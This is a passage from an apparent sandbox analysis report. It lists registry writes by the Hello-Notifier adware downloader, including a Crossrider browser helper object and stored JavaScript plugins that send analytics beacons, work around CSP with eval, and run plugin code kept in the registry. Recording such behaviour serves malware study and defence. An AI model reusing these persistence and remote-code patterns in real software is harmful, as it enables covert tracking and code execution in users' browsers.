a(c*365*3600*24*-1000);};function a(c){return new Date(new Date().getTime()+c);}})(appAPI);(function(a){a.analytics={};a.analytics.trackUrl=function(b){function c(h,j,e){function o(q,i){return q+Math.floor(Math.random()*(i-q));}var l=1000000000,p=o(l,9999999999),f=o(10000000,99999999),g=o(l,2147483647),n=(new Date()).getTime(),m=window.location,k=new Image(),d=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=1.3&utmn=\"+p+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+j+\"&utmr=\"+m+\"&utmp=\"+e+\"&utmac=\"+h+\"&utmcc=__utma%3D\"+f+\".\"+g+\".\"+n+\".\"+n+\".\"+n+\".2%3B%2B__utmb%3D\"+f+\"%3B%2B__utmc%3D\"+f+\"%3B%2B__utmz%3D\"+f+\".\"+n+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+m.host+\"%7Cutmcct%3D\"+m.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+f+\".-%3B\";k.src=d;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}c(this.settings.account,this.settings.domain,b);};a.analytics.trackEvent=function(c,e,b,d){function f(m,o,h,k,n,u,v){function t(x,i){return x+Math.floor(Math.random()*(i-x));}var q=1000000000,w=t(q,9999999999),j=t(10000000,99999999),l=t(q,2147483647),s=(new Date()).getTime(),r=window.location,p=new Image(),g=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=4.8.9&utmn=\"+w+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+o+\"&utmr=-&utmt=event&utme=5(\"+k+\"*\"+n+\"*\"+u+\")(\"+v+\")&utmp=\"+h+\"&utmac=\"+m+\"&utmcc=__utma%3D\"+j+\".\"+l+\".\"+s+\".\"+s+\".\"+s+\".2%3B%2B__utmb%3D\"+j+\"%3B%2B__utmc%3D\"+j+\"%3B%2B__utmz%3D\"+j+\".\"+s+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+r.host+\"%7Cutmcct%3D\"+r.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+j+\".-%3B\";p.src=g;}if(typeof(c)!=\"string\"){c=\"\";}if(typeof(e)!=\"string\"){e=\"\";}if(typeof(b)!=\"string\"){b=\"\";}if(typeof(d)!=\"number\"){d=0;}if((c===\"\")&&(e===\"\")&&(b===\"\")&&(d===0)){a.debug(\"Error: In order to use trackEvent you must specify the event parameters!\");return;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}f(this.settings.account,this.settings.domain,document.location.href,c,e,b,d);};a.analytics.settings={account:\"\",domain:\"\"};})(appAPI);(function(){if(typeof appAPI===\"undefined\"){appAPI={};}if(typeof appAPI.utils===\"undefined\"){appAPI.utils={};}appAPI.utils.indexOf=function(arr,searchElement){if(!arr){return -1;}var len=arr.length;if(len===0){return -1;}if(typeof arr.indexOf!==\"undefined\"){return arr.indexOf(searchElement,arguments[2]);}var n=0;if(arguments.length>2){n=Number(arguments[2]);if(n!=n){n=0;}else{if(n!=0&&n!=Infinity&&n!=-Infinity){n=(n>0||-1)*Math.floor(Math.abs(n));}}}if(n>=len){return -1;}var k=n>=0?n:Math.max(len-Math.abs(n),0);for(;k<len;k++){if(k in arr&&arr[k]===searchElement){return k;}}return -1;};(function(){var isFactory=function(type){return function(obj){var clas=Object.prototype.toString.call(obj).slice(8,-1);return obj!==undefined&&obj!==null&&clas===type;};};var isUndefined=function(obj){return typeof obj===\"undefined\";};var isNull=function(obj){return obj===null;};appAPI.utils.isObject=isFactory(\"Object\");appAPI.utils.isNumber=isFactory(\"Number\");appAPI.utils.isString=isFactory(\"String\");appAPI.utils.isArray=isFactory(\"Array\");appAPI.utils.isBoolean=isFactory(\"Boolean\");appAPI.utils.isFunction=isFactory(\"Function\");appAPI.utils.isDefined=function(elem){return(!isUndefined(elem)&&!isNull(elem));};}());appAPI.utils.getHost=function(url){var parser=document.createElement(\"a\");parser.href=url;return parser.hostname;};appAPI.utils.getDomain=(function(){var TLDs=[\"ac\",\"ad\",\"ae\",\"aero\",\"af\",\"ag\",\"ai\",\"al\",\"am\",\"an\",\"ao\",\"aq\",\"ar\",\"arpa\",\"as\",\"asia\",\"at\",\"au\",\"aw\",\"ax\",\"az\",\"ba\",\"bb\",\"bd\",\"be\",\"bf\",\"bg\",\"bh\",\"bi\",\"biz\",\"bj\",\"bm\",\"bn\",\"bo\",\"br\",\"bs\",\"bt\",\"bv\",\"bw\",\"by\",\"bz\",\"ca\",\"cat\",\"cc\",\"cd\",\"cf\",\"cg\",\"ch\",\"ci\",\"ck\",\"cl\",\"cm\",\"cn\",\"co\",\"com\",\"coop\",\"cr\",\"cu\",\"cv\",\"cx\",\"cy\",\"cz\",\"de\",\"dj\",\"dk\",\"dm\",\"do\",\"dz\",\"ec\",\"edu\",\"ee\",\"eg\",\"er\",\"es\",\"et\",\"eu\",\"fi\",\"fj\",\"fk\",\"fm\",\"fo\",\"fr\",\"ga\",\"gb\",\"gd\",\"ge\",\"gf\",\"gg\",\"gh\",\"gi\",\"gl\",\"gm\",\"gn\",\"gov\",\"gp\",\"gq\",\"gr\",\"gs\",\"gt\",\"gu\",\"gw\",\"gy\",\"hk\",\"hm\",\"hn\",\"hr\",\"ht\",\"hu\",\"id\",\"ie\",\"il\",\"im\",\"in\",\"info\",\"int\",\"io\",\"iq\",\"ir\",\"is\",\"it\",\"je\",\"jm\",\"jo\",\"jobs\",\"jp\",\"ke\",\"kg\",\"kh\",\"ki\",\"km\",\"kn\",\"kp\",\"kr\",\"kw\",\"ky\",\"kz\",\"la\",\"lb\",\"lc\",\"li\",\"lk\",\"lr\",\"ls\",\"lt\",\"lu\",\"lv\",\"ly\",\"ma\",\"mc\",\"md\",\"me\",\"mg\",\"mh\",\"mil\",\"mk\",\"ml\",\"mm\",\"mn\",\"mo\",\"mobi\",\"mp\",\"mq\",\"mr\",\"ms\",\"mt\",\"mu\",\"museum\",\"mv\",\"mw\",\"mx\",\"my\",\"mz\",\"na\",\"name\",\"nc\",\"ne\",\"net\",\"nf\",\"ng\",\"ni\",\"nl\",\"no\",\"np\",\"nr\",\"nu\",\"nz\",\"om\",\"org\",\"pa\",\"pe\",\"pf\",\"pg\",\"ph\",\"pk\",\"pl\",\"pm\",\"pn\",\"pr\",\"pro\",\"ps\",\"pt\",\"pw\",\"py\",\"qa\",\"re\",\"ro\",\"rs\",\"ru\",\"rw\",\"sa\",\"sb\",\"sc\",\"sd\",\"se\",\"sg\",\"sh\",\"si\",\"sj\",\"sk\",\"sl\",\"sm\",\"sn\",\"so\",\"sr\",\"st\",\"su\",\"sv\",\"sy\",\"sz\",\"tc\",\"td\",\"tel\",\"tf\",\"tg\",\"th\",\"tj\",\"tk\",\"tl\",\"tm\",\"tn\",\"to\",\"tp\",\"tr\",\"travel\",\"tt\",\"tv\",\"tw\",\"tz\",\"ua\",\"ug\",\"uk\",\"us\",\"uy\",\"uz\",\"va\",\"vc\",\"ve\",\"vg\",\"vi\",\"vn\",\"vu\",\"wf\",\"ws\",\"xn--0zwm56d\",\"xn--11b5bs3a9aj6g\",\"xn--3e0b707e\",\"xn--45brj9c\",\"xn--80akhbyknj4f\",\"xn--90a3ac\",\"xn--9t4b11yi5a\",\"xn--clchc0ea0b2g2a9gcd\",\"xn--deba0ad\",\"xn--fiqs8s\",\"xn--fiqz9s\",\"xn--fpcrj9c3d\",\"xn--fzc2c9e2c\",\"xn--g6w251d\",\"xn--gecrj9c\",\"xn--h2brj9c\",\"xn--hgbk6aj7f53bba\",\"xn--hlcj6aya9esc7a\",\"xn--j6w193g\",\"xn--jxalpdlp\",\"xn--kgbechtv\",\"xn--kprw13d\",\"xn--kpry57d\",\"xn--lgbbat1ad8j\",\"xn--mgbaam7a8h\",\"xn--mgbayh7gpa\",\"xn--mgbbh1a71e\",\"xn--mgbc0a9azcg\",\"xn--mgberp4a5d4ar\",\"xn--o3cw4h\",\"xn--ogbpf8fl\",\"xn--p1ai\",\"xn--pgbs0dh\",\"xn--s9brj9c\",\"xn--wgbh1c\",\"xn--wgbl6a\",\"xn--xkc2al3hye2a\",\"xn--xkc2dl3a5ee0h\",\"xn--yfro4i67o\",\"xn--ygbi2ammx\",\"xn--zckzah\",\"xxx\",\"ye\",\"yt\",\"za\",\"zm\",\"zw\"].join();return function(url){var parts,part,tldLevelsChecked;host=appAPI.utils.getHost(url);parts=host.split(\".\");if(parts[0]===\"www\"&&parts[1]!==\"com\"){parts.shift();}while(parts.length>0){part=parts.pop();tldLevelsChecked++;if(tldLevelsChecked>2||appAPI.utils.indexOf(TLDs,part)<0){break;}}return part;};}());appAPI.utils.newFunction=function(code){try{return new Function(code);}catch(e){if(appAPI.platform==\"FF\"&&e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){return FFInternal.newFunction(code);}}};appAPI.utils.eval=eval;if(appAPI.platform===\"FF\"){try{eval(\"var testEval = true;\");}catch(e){appAPI.utils.eval=function(code,scope){if(e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){var foo=FFInternal.newFunction(code);if(scope){foo.call(scope);return;}foo();}};}}appAPI.utils.trim=function(str){if(!appAPI.utils.isString(str)){return str;}if(typeof str.trim===\"function\"){return str.trim();}else{return str.replace(/^\\s+|\\s+$/g,\"\");}};}());(function(){appAPI.utils.Base64={_keyStr:\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\",encode:function(c){var a=\"\";var k,h,f,j,g,e,d;var b=0;c=appAPI.utils.Base64._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b++);h=c.charCodeAt(b++);f=c.charCodeAt(b++);j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64;}else{if(isNaN(f)){d=64;}}a=a+this._keyStr.charAt(j)+this._keyStr.charAt(g)+this._keyStr.charAt(e)+this._keyStr.charAt(d);}return a;},decode:function(c){var a=\"\";var k,h,f;var j,g,e,d;var b=0;c=c.replace(/[^A-Za-z0-9\\+\\/\\=]/g,\"\");while(b<c.length){j=this._keyStr.indexOf(c.charAt(b++));g=this._keyStr.indexOf(c.charAt(b++));e=this._keyStr.indexOf(c.charAt(b++));d=this._keyStr.indexOf(c.charAt(b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a=a+String.fromCharCode(k);if(e!=64){a=a+String.fromCharCode(h);}if(d!=64){a=a+String.fromCharCode(f);}}a=appAPI.utils.Base64._utf8_decode(a);return a;},_utf8_encode:function(b){b=b.replace(/\\r\\n/g,\"\\n\");var a=\"\";for(var e=0;e<b.length;e++){var d=b.charCodeAt(e);if(d<128){a+=String.fromCharCode(d);}else{if((d>127)&&(d<2048)){a+=String.fromCharCode((d>>6)|192);a+=String.fromCharCode((d&63)|128);}else{a+=String.fromCharCode((d>>12)|224);a+=String.fromCharCode(((d>>6)&63)|128);a+=String.fromCharCode((d&63)|128);}}}return a;},_utf8_decode:function(a){var b=\"\";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b+=String.fromCharCode(e);d++;}else{if((e>191)&&(e<224)){c2=a.charCodeAt(d+1);b+=String.fromCharCode(((e&31)<<6)|(c2&63));d+=2;}else{c2=a.charCodeAt(d+1);c3=a.charCodeAt(d+2);b+=String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d+=3;}}}return b;}};})();(function(){function a(b){if(appAPI[b]){return appAPI[b];}return function(){var c=Array.prototype.slice.call(arguments,0);return window[b].apply(window,c);};}appAPI.setTimeout=a(\"setTimeout\");appAPI.setInterval=a(\"setInterval\");appAPI.clearTimeout=a(\"clearTimeout\");appAPI.clearInterval=a(\"clearInterval\");}());(function(){appAPI.utils.MD5=(function(){var q=0;var y=\"\";function p(B){return z(n(r(B)));}function o(B){return b(n(r(B)));}function i(B,C){return e(n(r(B)),C);}function w(B,C){return z(g(r(B),r(C)));}function l(B,C){return b(g(r(B),r(C)));}function h(B,D,C){return e(g(r(B),r(D)),C);}function A(){return p(\"abc\").toLowerCase()==\"900150983cd24fb0d6963f7d28e17f72\";}function n(B){return u(f(m(B),B.length*8));}function g(D,G){var F=m(D);if(F.length>16){F=f(F,D.length*8);}var B=Array(16),E=Array(16);for(var C=0;C<16;C++){B[C]=F[C]^909522486;E[C]=F[C]^1549556828;}var H=f(B.concat(m(G)),512+G.length*8);return u(f(E.concat(H),512+128));}function z(D){if(typeof q===\"undefined\"){q=0;}var F=q?\"0123456789ABCDEF\":\"0123456789abcdef\";var C=\"\";var B;for(var E=0;E<D.length;E++){B=D.charCodeAt(E);C+=F.charAt((B>>>4)&15)+F.charAt(B&15);}return C;}function b(D){if(typeof y===\"undefined\"){y=\"\";}var G=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var C=\"\";var B=D.length;for(var F=0;F<B;F+=3){var H=(D.charCodeAt(F)<<16)|(F+1<B?D.charCodeAt(F+1)<<8:0)|(F+2<B?D.charCodeAt(F+2):0);for(var E=0;E<4;E++){if(F*8+E*6>D.length*8){C+=y;}else{C+=G.charAt((H>>>6*(3-E))&63);}}}return C;}function e(L,D){var C=D.length;var K,G,B,M,F;var J=Array(Math.ceil(L.length/2));for(K=0;K<J.length;K++){J[K]=(L.charCodeAt(K*2)<<8)|L.charCodeAt(K*2+1);}var I=Math.ceil(L.length*8/(Math.log(D.length)/Math.log(2)));var H=Array(I);for(G=0;G<I;G++){F=Array();M=0;for(K=0;K<J.length;K++){M=(M<<16)+J[K];B=Math.floor(M/C);M-=B*C;if(F.length>0||B>0){F[F.length]=B;}}H[G]=M;J=F;}var E=\"\";for(K=H.length-1;K>=0;K--){E+=D.charAt(H[K]);}return E;}function r(D){var C=\"\";var E=-1;var B,F;while(++E<D.length){B=D.charCodeAt(E);F=E+1<D.length?D.charCodeAt(E+1):0;if(55296<=B&&B<=56319&&56320<=F&&F<=57343){B=65536+((B&1023)<<10)+(F&1023);E++;}if(B<=127){C+=String.fromCharCode(B);}else{if(B<=2047){C+=String.fromCharCode(192|((B>>>6)&31),128|(B&63));}else{if(B<=65535){C+=String.fromCharCode(224|((B>>>12)&15),128|((B>>>6)&63),128|(B&63));}else{if(B<=2097151){C+=String.fromCharCode(240|((B>>>18)&7),128|((B>>>12)&63),128|((B>>>6)&63),128|(B&63));}}}}}return C;}function v(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode(C.charCodeAt(D)&255,(C.charCodeAt(D)>>>8)&255);}return B;}function k(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode((C.charCodeAt(D)>>>8)&255,C.charCodeAt(D)&255);}return B;}function m(C){var B=Array(C.length>>2);for(var D=0;D<B.length;D++){B[D]=0;}for(var D=0;D<C.length*8;D+=8){B[D>>5]|=(C.charCodeAt(D/8)&255)<<(D%32);}return B;}function u(C){var B=\"\";for(var D=0;D<C.length*32;D+=8){B+=String.fromCharCode((C[D>>5]>>>(D%32))&255);}return B;}function f(L,G){L[G>>5]|=128<<((G)%32);L[(((G+64)>>>9)<<4)+14]=G;var K=1732584193;var J=-271733879;var I=-1732584194;var H=271733878;for(var D=0;D<L.length;D+=16){var F=K;var E=J;var C=I;var B=H;K=c(K,J,I,H,L[D+0],7,-680876936);H=c(H,K,J,I,L[D+1],12,-389564586);I=c(I,H,K,J,L[D+2],17,606105819);J=c(J,I,H,K,L[D+3],22,-1044525330);K=c(K,J,I,H,L[D+4],7,-176418897);H=c(H,K,J,I,L[D+5],12,1200080426);I=c(I,H,K,J,L[D+6],17,-1473231341);J=c(J,I,H,K,L[D+7],22,-45705983);K=c(K,J,I,H,L[D+8],7,1770035416);H=c(H,K,J,I,L[D+9],12,-1958414417);I=c(I,H,K,J,L[D+10],17,-42063);J=c(J,I,H,K,L[D+11],22,-1990404162);K=c(K,J,I,H,L[D+12],7,1804603682);H=c(H,K,J,I,L[D+13],12,-40341101);I=c(I,H,K,J,L[D+14],17,-1502002290);J=c(J,I,H,K,L[D+15],22,1236535329);K=j(K,J,I,H,L[D+1],5,-165796510);H=j(H,K,J,I,L[D+6],9,-1069501632);I=j(I,H,K,J,L[D+11],14,643717713);J=j(J,I,H,K,L[D+0],20,-373897302);K=j(K,J,I,H,L[D+5],5,-701558691);H=j(H,K,J,I,L[D+10],9,38016083);I=j(I,H,K,J,L[D+15],14,-660478335);J=j(J,I,H,K,L[D+4],20,-405537848);K=j(K,J,I,H,L[D+9],5,568446438);H=j(H,K,J,I,L[D+14],9,-1019803690);I=j(I,H,K,J,L[D+3],14,-187363961);J=j(J,I,H,K,L[D+8],20,1163531501);K=j(K,J,I,H,L[D+13],5,-1444681467);H=j(H,K,J,I,L[D+2],9,-51403784);I=j(I,H,K,J,L[D+7],14,1735328473);J=j(J,I,H,K,L[D+12],20,-1926607734);K=t(K,J,I,H,L[D+5],4,-378558);H=t(H,K,J,I,L[D+8],11,-2022574463);I=t(I,H,K,J,L[D+11],16,1839030562);J=t(J,I,H,K,L[D+14],23,-35309556);K=t(K,J,I,H,L[D+1],4,-1530992060);H=t(H,K,J,I,L[D+4],11,1272893353);I=t(I,H,K,J,L[D+7],16,-155497632);J=t(J,I,H,K,L[D+10],23,-1094730640);K=t(K,J,I,H,L[D+13],4,681279174);H=t(H,K,J,I,L[D+0],11,-358537222);I=t(I,H,K,J,L[D+3],16,-722521979);J=t(J,I,H,K,L[D+6],23,76029189);K=t(K,J,I,H,L[D+9],4,-640364487);H=t(H,K,J,I,L[D+12],11,-421815835);I=t(I,H,K,J,L[D+15],16,530742520);J=t(J,I,H,K,L[D+2],23,-995338651);K=a(K,J,I,H,L[D+0],6,-198630844);H=a(H,K,J,I,L[D+7],10,1126891415);I=a(I,H,K,J,L[D+14],15,-1416354905);J=a(J,I,H,K,L[D+5],21,-57434055);K=a(K,J,I,H,L[D+12],6,1700485571);H=a(H,K,J,I,L[D+3],10,-1894986606);I=a(I,H,K,J,L[D+10],15,-1051523);J=a(J,I,H,K,L[D+1],21,-2054922799);K=a(K,J,I,H,L[D+8],6,1873313359);H=a(H,K,J,I,L[D+15],10,-30611744);I=a(I,H,K,J,L[D+6],15,-1560198380);J=a(J,I,H,K,L[D+13],21,1309151649);K=a(K,J,I,H,L[D+4],6,-145523070);H=a(H,K,J,I,L[D+11],10,-1120210379);I=a(I,H,K,J,L[D+2],15,718787259);J=a(J,I,H,K,L[D+9],21,-343485551);K=s(K,F);J=s(J,E);I=s(I,C);H=s(H,B);}return Array(K,J,I,H);}function d(G,D,C,B,F,E){return s(x(s(s(D,G),s(B,E)),F),C);}function c(D,C,H,G,B,F,E){return d((C&H)|((~C)&G),D,C,B,F,E);}function j(D,C,H,G,B,F,E){return d((C&G)|(H&(~G)),D,C,B,F,E);}function t(D,C,H,G,B,F,E){return d(C^H^G,D,C,B,F,E);}function a(D,C,H,G,B,F,E){return d(H^(C|(~G)),D,C,B,F,E);}function s(B,E){var D=(B&65535)+(E&65535);var C=(B>>16)+(E>>16)+(D>>16);return(C<<16)|(D&65535);}function x(B,C){return(B<<C)|(B>>>(32-C));}return{encode:p};}());}());\n//------------------ PLUGIN CrossriderUtils END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\ModeType = "production" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\JavaScript = "\n//------------------ PLUGIN IEInternal START ------------------\nvar Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===\"undefined\"){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==\"undefined\"){window={};}if(typeof window.document===\"undefined\"){window.document={};document=window.document;}if(typeof window.alert===\"undefined\"){window.alert=function(b){var c;if(typeof b===\"undefined\"){c=\"undefined\";}else{if(b===null){c=\"null\";}else{c=b.toString();}}if(typeof c===\"string\"){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===\"undefined\"){window.console={};console=window.console;}if(typeof console.log===\"undefined\"){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===\"undefined\"){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===\"undefined\"){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===\"undefined\"){window.console.error=function(a){};console.error=window.console.error;}if(typeof console.assert===\"undefined\"){window.console.assert=function(a){};console.assert=window.console.assert;}if(typeof console.dir===\"undefined\"){window.console.dir=function(a){};console.dir=window.console.dir;}if(typeof console.clear===\"undefined\"){window.console.clear=function(a){};console.clear=window.console.clear;}if(typeof console.profile===\"undefined\"){window.console.profile=function(a){};console.profile=window.console.profile;}if(typeof console.profileEnd===\"undefined\"){window.console.profileEnd=function(a){};console.profileEnd=window.console.profileEnd;}(function($){if(typeof appAPI.internal===\"undefined\"){appAPI.internal={};}if(typeof appAPI.internal.prefs===\"undefined\"){appAPI.internal.prefs={};}appAPI.internal.prefs.getChar=function(key,section){var value=$.getPref(key,section);if(value===\"__CR_@FAILED_DOWNLOAD_READ@_CR__\"){return null;}return value;};appAPI.internal.prefs.getInt=function(key,section){return parseInt(appAPI.internal.prefs.getChar(key,section));};appAPI.internal.prefs.setInt=function(value,key,section){return $.setIntPref(value,key,section);};appAPI.internal.prefs.setChar=function(value,key,section){return $.setCharPref(value,key,section);};appAPI.internal.prefs.getChildValueNames=function(section){var commaSeperatedList=$.getChildValueNames(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};appAPI.internal.prefs.getChildKeys=function(section){if(typeof $.getChildKeys===\"undefined\"){return;}var commaSeperatedList=$.getChildKeys(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};if(typeof appAPI.internal.debug===\"undefined\"){appAPI.internal.debug={};}appAPI.internal.debug.getDebugUrl=function(){var appCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedAppUrl\",\"Debug\");var bgCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedBgUrl\",\"Debug\");var res={userCode:appCodeUrl,backgroundCode:bgCodeUrl};return res;};appAPI.internal.debug.isDebugMode=function(){return(appAPI.internal.prefs.getChar(\"IsDebugMode\",\"Debug\")==\"1\");};appAPI.internal.debug.turnOn=function(debugUrls){if(typeof debugUrls===\"undefined\"||debugUrls===null){return false;}if(typeof debugUrls.userCode!==\"string\"){return false;}if(typeof debugUrls.backgroundCode!==\"string\"){return false;}appAPI.internal.prefs.setInt(\"IsDebugMode\",1,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedAppUrl\",debugUrls.userCode,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedBgUrl\",debugUrls.backgroundCode,\"Debug\");if(typeof $.reloadBg!==\"undefined\"){$.reloadBg();}return true;};appAPI.internal.debug.turnOff=function(){$.setIntPref(\"IsDebugMode\",0,\"Debug\");};appAPI.internal.reloadBackground=function(){if(typeof $.reloadBg===\"undefined\"){return false;}$.reloadBg();return true;};appAPI.internal.console=function(text,level){msgToSend={text:text,level:level};appAPI.internal.message.send({eventName:\"externalConsole\",eventContent:msgToSend});};appAPI.internal.console.log=function(text){appAPI.internal.console(text,\"log\");};appAPI.internal.console.info=function(text){appAPI.internal.console(text,\"info\");};appAPI.internal.console.warn=function(text){appAPI.internal.console(text,\"warn\");};appAPI.internal.console.error=function(text){appAPI.internal.console(text,\"error\");};appAPI.internal.log=function(str){$.log(str);};appAPI.internal.forceUpdate=function(){$.forceUpdate();};appAPI.internal.globalEval=function(js){if(typeof $.eval===\"undefined\"){console.error(\"appAPI.internal.globalEval is not supported\");return false;}if(typeof js!==\"string\"){console.error(\"appAPI.internal.globalEval expected a string as the 1st parameter and got: \"+typeof js);return false;}$.eval(js);return true;};if(typeof $.isIframe!==\"undefined\"){if(typeof appAPI.dom===\"undefined\"){appAPI.dom={};}appAPI.dom.isIframe=function(){return $.isIframe();};}appAPI.internal.getIsAddressBarShowing=function(){if(typeof $.isAddressBarShowing!==\"undefined\"){return $.isAddressBarShowing();}return false;};appAPI.internal.userCode={};appAPI.internal.userCode.getExtension=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"AppJavaScript\",\"Code\"));},10);};appAPI.internal.userCode.getBackground=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"BgJavaScript\",\"Code\"));},10);};appAPI.internal.plugins={};appAPI.internal.plugins.getOrder=function(target,callback){if(target===0){target=\"BgPluginList\";}else{if(target===1){target=\"AppPluginList\";}else{if(target===5){target=\"PopupPluginList\";}else{return;}}}var pluginsListIds=appAPI.internal.prefs.getChar(target,\"Plugins\");if(pluginsListIds){pluginsListIds=pluginsListIds.split(\",\");}var pluginsList=[];for(i=0;i<pluginsListIds.length;i++){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginsListIds[i]);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginsListIds[i]);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginsListIds[i]);pluginsList.push({id:pluginsListIds[i],name:name,url:url,ver:ver});}setTimeout(function(){callback(pluginsList);},10);};appAPI.internal.plugins.getInfo=function(pluginId,callback){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginId);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginId);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginId);setTimeout(function(){callback({name:name,ver:ver,id:pluginId});},10);};appAPI.internal.plugins.getCode=function(plugin,callback){var code=appAPI.internal.prefs.getChar(\"JavaScript\",\"Plugins\\\\\"+plugin.id);setTimeout(function(){callback(code);},10);};})(appAPIinternal);\n//------------------ PLUGIN IEInternal END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\OnRequestPluginList = "14,42,41,39,38,43,45,64,72" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\ActiveAppId = "37928" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Name = "Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Version = "2" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
